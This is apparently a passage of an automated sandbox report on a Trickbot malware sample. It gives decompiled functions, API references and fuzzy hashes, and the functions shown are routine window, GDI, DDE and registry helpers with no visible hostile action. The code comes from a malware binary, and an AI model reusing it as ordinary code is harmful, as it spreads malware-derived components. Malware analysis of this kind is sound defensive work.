0x004243e2
0x004243ea
0x004243ea
0x004243f4
0x004243fa
0x004243fd
0x00424405
0x00424405
0x0042440a
0x00424413
0x00424422
0x00424435
0x00424448
0x00424454
0x0042445e
0x00424464
0x00424466
0x00424466
0x00424468
0x0042446d
0x0042446f
0x00424474

APIs

Part of subcall function 004214F6: __EH_prolog.LIBCMT ref: 004214FB
Part of subcall function 004214F6: GetDC.USER32(?), ref: 00421524

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004243D1
SelectObject.GDI32(?,00000000), ref: 004243E8
GetTextMetricsA.GDI32(?,?), ref: 004243F4
SelectObject.GDI32(?,?), ref: 00424405
SetRectEmpty.USER32(?), ref: 00424413
GetSystemMetrics.USER32(00000006), ref: 00424448

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: 5272e07e1f72a70fe3f68d45a55a713366ba12661c2c458fd48274aee203f135
Instruction ID: 9ba3e64bc3a9e1fa061dd9c1a67eab1121651931f825b011c5bad6a3fd72f779
Opcode Fuzzy Hash: 5272e07e1f72a70fe3f68d45a55a713366ba12661c2c458fd48274aee203f135
Instruction Fuzzy Hash: D0215E72E00219EFDF00DFA4DC89CAEBBB9FF44304B54402AE501A3260DB74AE11CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00422BA1, Relevance: 9.1, APIs: 6, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422BA1(void* __ecx) {
				void* __ebp;
				struct HACCEL__* _t26;
				struct HACCEL__* _t31;
				void* _t42;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t45 = 0;
				_t26 =  *(__ecx + 0x60);
				_t42 = __ecx + 0x60;
				_t49 =  *((intOrPtr*)(_t26 - 8));
				if( *((intOrPtr*)(_t26 - 8)) == 0) {
					_t26 = E0041C67E(_t42, _t49,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E00432562() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t26 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t26;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E00432562() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t26 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t26;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E00432562() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t31 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t31;
					return _t31;
				}
				return _t26;
			}

0x00422ba4
0x00422ba6
0x00422ba9
0x00422bac
0x00422baf
0x00422bb2
0x00422bb7
0x00422bb7
0x00422bcb
0x00422bd7
0x00422be2
0x00422beb
0x00422bed
0x00422bf0
0x00422bf0
0x00422bf5
0x00422c01
0x00422c0c
0x00422c15
0x00422c17
0x00422c1a
0x00422c1a
0x00422c1f
0x00422c2b
0x00422c36
0x00422c3f
0x00422c41
0x00000000
0x00422c41
0x00422c48

APIs

LoadMenuA.USER32(?,?), ref: 00422BE0
LoadAcceleratorsA.USER32(?,?), ref: 00422BEB
LoadMenuA.USER32(?,?), ref: 00422C0A
LoadAcceleratorsA.USER32(?,?), ref: 00422C15
LoadMenuA.USER32(?,?), ref: 00422C34
LoadAcceleratorsA.USER32(?,?), ref: 00422C3F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Load$AcceleratorsMenu
String ID:
API String ID: 144087665-0
Opcode ID: d28eee83446aee033cb96b70b19bcd7dcb7d377c9e814a5fb453ca1c5690d225
Instruction ID: 695b2b95001d0648f3485155c7e7e05556f449ab2dfbcd4e8162ad35ddaa80bb
Opcode Fuzzy Hash: d28eee83446aee033cb96b70b19bcd7dcb7d377c9e814a5fb453ca1c5690d225
Instruction Fuzzy Hash: 26213E71500B28EFC270AF669A40937F7F8FF14711740542FFA8682911D6B9F880DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004286DC, Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004286DC(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E00428778();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E004041A9();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}

0x004286e4
0x004286ec
0x004286ee
0x00428755
0x00428763
0x00428704
0x00428706
0x00428708
0x0042870a
0x00428715
0x00428717
0x00428724
0x00428724
0x00428726
0x0042872c
0x00428730
0x0042876c
0x00428741
0x00428744
0x00428746
0x00428746
0x00428730
0x00428775
0x00000000
0x00000000
0x00000000
0x0042870c
0x0042870c
0x0042870d
0x0042870f
0x00428711
0x00000000
0x0042870c
0x00428768
0x00428751
0x00428753
0x00000000
0x00000000
0x00000000
0x00428753
0x004286f0
0x004286f7
0x0042874e
0x0042874e
0x00000000
0x0042874e
0x004286f9
0x00428700
0x00000000
0x00000000
0x00428702
0x00000000

APIs

GetParent.USER32(?), ref: 0042870F
GetLastActivePopup.USER32(?), ref: 0042871E
IsWindowEnabled.USER32(?), ref: 00428733
EnableWindow.USER32(?,00000000), ref: 00428746
GetWindowLongA.USER32(?,000000F0), ref: 00428758
GetParent.USER32(?), ref: 00428766

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: b1deaf784306d6df2be37c99d0abefcacb69dc60422b5eb21341996539967a31
Instruction ID: e0f9b195241dfb9b8aa2cada647a459aea9430d5cc9abc36a2b3baaee5cdbdcd
Opcode Fuzzy Hash: b1deaf784306d6df2be37c99d0abefcacb69dc60422b5eb21341996539967a31
Instruction Fuzzy Hash: 6A1170727073316B96216A69AC84B2FB2986FD4BA1FB5012FED00E7345DF6CCC0146AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042D210, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0042D210(intOrPtr _a4) {
				intOrPtr _v4;
				struct HWND__* _t15;
				struct HWND__* _t17;
				signed int _t21;
				intOrPtr _t28;
				void* _t30;
				struct HWND__* _t32;

				_v4 = _t28;
				_t15 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t15;
				if(_t32 == 0) {
					return _t15;
				} else {
					while(1) {
						_push(_t32);
						_t30 = E00418874();
						if(_t30 != 0) {
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E0042D065(_t19, _t32) != 0) {
								_t21 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
										ShowWindow(_t32, 4);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
									}
								} else {
									if((_t21 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
						if(_t32 == 0) {
							return _t17;
						}
					}
				}
			}

0x0042d213
0x0042d226
0x0042d228
0x0042d22c
0x0042d2a5
0x0042d22e
0x0042d236
0x0042d236
0x0042d23c
0x0042d240
0x0042d246
0x0042d24b
0x0042d25b
0x0042d266
0x0042d284
0x0042d28f
0x0042d291
0x0042d291
0x0042d268
0x0042d272
0x0042d277
0x0042d279
0x0042d279
0x0042d272
0x0042d266
0x0042d24b
0x0042d298
0x0042d29a
0x0042d29e
0x00000000
0x0042d2a1
0x0042d29e
0x0042d236

APIs

GetDesktopWindow.USER32 ref: 0042D219
GetWindow.USER32(00000000), ref: 0042D226
GetWindowLongA.USER32(00000000,000000F0), ref: 0042D25B
ShowWindow.USER32(00000000,00000000), ref: 0042D277
ShowWindow.USER32(00000000,00000004), ref: 0042D28F
GetWindow.USER32(00000000,00000002), ref: 0042D298

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 0df88fc64002af3fd1eb35134b311337ef61cacab5b3f29a159aefc937fd8bec
Instruction ID: 903b80a427b79124565d036136ab7df7ba34bbb3bdfed7425468068a3415a626
Opcode Fuzzy Hash: 0df88fc64002af3fd1eb35134b311337ef61cacab5b3f29a159aefc937fd8bec
Instruction Fuzzy Hash: FE110E72B01761AAD2229628AC4ABABB38C9F41360FA40296F5009A384CB28DC4085BC

Uniqueness

Uniqueness Score: -1.00%

Function 00428879, Relevance: 9.1, APIs: 6, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00428879(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t29;

				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x90));
				}
				if(_a8 != 0) {
					_push(_a4);
					if(_a12 != 0) {
						_t29 = E0043201B(__ecx);
						if(_t29 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t29, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t29);
						return 0 | _t21 == 0x00000000;
					}
					_t29 = E0043201B(__ecx);
					if(_t29 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t29, _a8);
					goto L10;
				}
				_t29 = E00431F87(__ecx);
				if(_t29 != 0) {
					_t21 = RegDeleteKeyA(_t29, _a4);
					goto L10;
				}
				goto L3;
			}

0x00428882
0x00000000
0x0042890d
0x00428888
0x004288a9
0x004288ac
0x004288ca
0x004288ce
0x00428895
0x00000000
0x00428895
0x004288e6
0x004288ec
0x004288ef
0x00000000
0x004288f9
0x004288b3
0x004288b7
0x00000000
0x00000000
0x004288bd
0x00000000
0x004288bd
0x0042888f
0x00428893
0x0042889d
0x00000000
0x0042889d
0x00000000

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042889D
RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 004288BD
RegCloseKey.ADVAPI32(00000000), ref: 004288EF

Part of subcall function 00431F87: RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432007
Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432011

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042890D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: 80f9fa64e6c2a6d8de0caac8d766ff3f62968a89e1417f100ba23b529a70ff8e
Instruction ID: 48bcdaa2f9ce32829966b4feb2f3e5b080be05f1c9aa6f6bcedbd04c2fb2498b
Opcode Fuzzy Hash: 80f9fa64e6c2a6d8de0caac8d766ff3f62968a89e1417f100ba23b529a70ff8e
Instruction Fuzzy Hash: 3A117732502525FBCF262F60EC04BAF3B75AF04355F94402AFA1599160CB79CD51EB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00436F50, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00436F50(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E00436FD2(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E00436DCB(_t14, __ecx, 0, 0);
			}

0x00436f53
0x00436f54
0x00436f65
0x00436f70
0x00436f79
0x00436f7c
0x00436f86
0x00436f94
0x00436fa4
0x00436fbf
0x00436fd1

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00436F65
GetDeviceCaps.GDI32(?,00000008), ref: 00436F6E

Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0

SetMapMode.GDI32(?,00000001), ref: 00436F86
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00436F94
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00436FA4
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00436FBF

Part of subcall function 00436DCB: GetViewportExtEx.GDI32(?,?), ref: 00436DE2
Part of subcall function 00436DCB: GetWindowExtEx.GDI32(?,?), ref: 00436DEF
Part of subcall function 00436DCB: GetDeviceCaps.GDI32(?,00000058), ref: 00436E5A
Part of subcall function 00436DCB: GetDeviceCaps.GDI32(?,0000005A), ref: 00436E77
Part of subcall function 00436DCB: SetMapMode.GDI32(00000000,00000008), ref: 00436E9D
Part of subcall function 00436DCB: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00436EAE
Part of subcall function 00436DCB: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00436EBF

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: 3771a1693c930a607ffe9eeab7710116c321ba7e8f33d8577270b197d535bb5b
Instruction ID: ab10860d24474dd31859e5e511304c655a504ba448b904eb4759dc48bb87347c
Opcode Fuzzy Hash: 3771a1693c930a607ffe9eeab7710116c321ba7e8f33d8577270b197d535bb5b
Instruction Fuzzy Hash: E6015231200604BFDB215B56DC4AD5BBFFDEF89B20B00452DF156A21B0DBB1AC10DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042DE4A, Relevance: 9.1, APIs: 6, Instructions: 53
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0042DE4A(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v532;
				void* __ebp;
				long _t19;
				void* _t23;
				void* _t27;

				_push( &_v8);
				_push( &_v12);
				_push(_a8);
				_t27 = __ecx;
				_push(0x3e8);
				L0040DA08();
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
				_t19 = GlobalUnlock(_v8);
				_push(_v8);
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push(_a8);
				L0040DA02();
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
				if(E0041B7FA(_t27) != 0) {
					_t23 = E00432562();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
				}
				return 0;
			}

0x0042de59
0x0042de5d
0x0042de63
0x0042de66
0x0042de68
0x0042de69
0x0042de84
0x0042de8d
0x0042de93
0x0042de9b
0x0042dea0
0x0042dea1
0x0042dea2
0x0042dea5
0x0042deb2
0x0042dec4
0x0042dec6
0x0042ded9
0x0042ded9
0x0042dee2

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042DE69
GlobalLock.KERNEL32(?), ref: 0042DE71
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 0042DE84
GlobalUnlock.KERNEL32(?), ref: 0042DE8D
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042DEA5
PostMessageA.USER32(?,000003E4,?,00000000), ref: 0042DEB2

Part of subcall function 0041B7FA: IsWindowEnabled.USER32(?), ref: 0041B804

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: 5c8282126ffabcf2a1b1566253d70a4ab444e7e2f3130adfde91821aaf0419e8
Instruction ID: d9d1a570f6aed9c4a1f84f5da4b610d7a73c25a4d883f5e070b8c32cfa3d59cd
Opcode Fuzzy Hash: 5c8282126ffabcf2a1b1566253d70a4ab444e7e2f3130adfde91821aaf0419e8
Instruction Fuzzy Hash: 0D01A132600108BBDB01EBA1DC89EDF7BBCFF58300F004179B90AE61A1CA749E459B64

Uniqueness

Uniqueness Score: -1.00%

Function 004333DA, Relevance: 9.0, APIs: 6, Instructions: 48
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004333DA(void* _a4, char* _a8, char* _a12) {
				void* _t19;
				signed int _t21;
				long _t24;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						return 0;
					}
					_t24 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					if(RegCloseKey(_a4) != 0 || _t24 != 0) {
						goto L6;
					} else {
						_t19 = 1;
						return _t19;
					}
				}
				_t21 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t21 + 1;
			}

0x004333e2
0x0043341c
0x00433454
0x00000000
0x00433454
0x0043343f
0x00433449
0x00000000
0x0043344f
0x00433451
0x00000000
0x00433451
0x00433449
0x004333fb
0x00433403
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 004333E7
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 004333FB
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00433414
lstrlenA.KERNEL32(?), ref: 00433421
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00433436
RegCloseKey.ADVAPI32(?), ref: 00433441

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: 8eb80dff837fc4ab0918ebb6310094e65cd3cdbb69cbc88cb76b00f12fc1ae21
Instruction ID: 7b29450c4508ad6f1e0ba80df4d22da6d0018238b9a1ffd76a0ae7c7bea6f4fb
Opcode Fuzzy Hash: 8eb80dff837fc4ab0918ebb6310094e65cd3cdbb69cbc88cb76b00f12fc1ae21
Instruction Fuzzy Hash: 9F012C32544108FFEF121FA1EC05FAA3B79FB18756F10A021FE15D9160D3B58A60DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00422719, Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422719(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E004225BE(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E004225BE(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
						}
					}
				}
				return _t3;
			}

0x0042271c
0x00422722
0x00422726
0x00422728
0x0042272e
0x00422740
0x00422757
0x00422759
0x0042277a
0x00000000
0x00422784
0x0042276c
0x00422770
0x00422778
0x00000000
0x00000000
0x00422742
0x00422743
0x00422745
0x00422749
0x0042274e
0x00422755
0x00000000
0x00000000
0x00422755
0x00422749
0x00422740
0x0042272e
0x0042278d

APIs

GetFocus.USER32 ref: 0042271C

Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF

GetParent.USER32(00000000), ref: 00422743

Part of subcall function 004225BE: GetClassNameA.USER32(00000000,?,0000000A), ref: 004225EA
Part of subcall function 004225BE: lstrcmpiA.KERNEL32(?,combobox), ref: 004225F9

GetWindowLongA.USER32(?,000000F0), ref: 0042275E
GetParent.USER32(?), ref: 0042276C
GetDesktopWindow.USER32 ref: 00422770
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00422784

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 9a6ba839982207bab7df84b2310a581590c58d6d87b91a8c9e456422b7b249f4
Instruction ID: e0bc8e677ae7c427d02043935cf1a87f6b1d1616723f9544aadc7194c24e27ed
Opcode Fuzzy Hash: 9a6ba839982207bab7df84b2310a581590c58d6d87b91a8c9e456422b7b249f4
Instruction Fuzzy Hash: 7DF0F93230453277D73216357DC8B6F91186BD0B52F984226F912B23C0DBEC8C4245AE

Uniqueness

Uniqueness Score: -1.00%

Function 00422633, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00422633(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}

0x00422642
0x0042264e
0x00422650
0x00422653
0x00422655
0x00422659
0x00000000
0x00000000
0x00422666
0x00422697
0x00422697
0x00422699
0x00000000
0x00422678
0x0042267d
0x00422683
0x00422695
0x00000000
0x0042269c
0x00000000
0x00422695
0x00422666
0x00000000

APIs

ClientToScreen.USER32(?,?), ref: 00422642
GetWindow.USER32(?,00000005), ref: 00422653
GetDlgCtrlID.USER32(00000000), ref: 0042265C
GetWindowLongA.USER32(00000000,000000F0), ref: 0042266B
GetWindowRect.USER32(00000000,?), ref: 0042267D
PtInRect.USER32(?,?,?), ref: 0042268D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

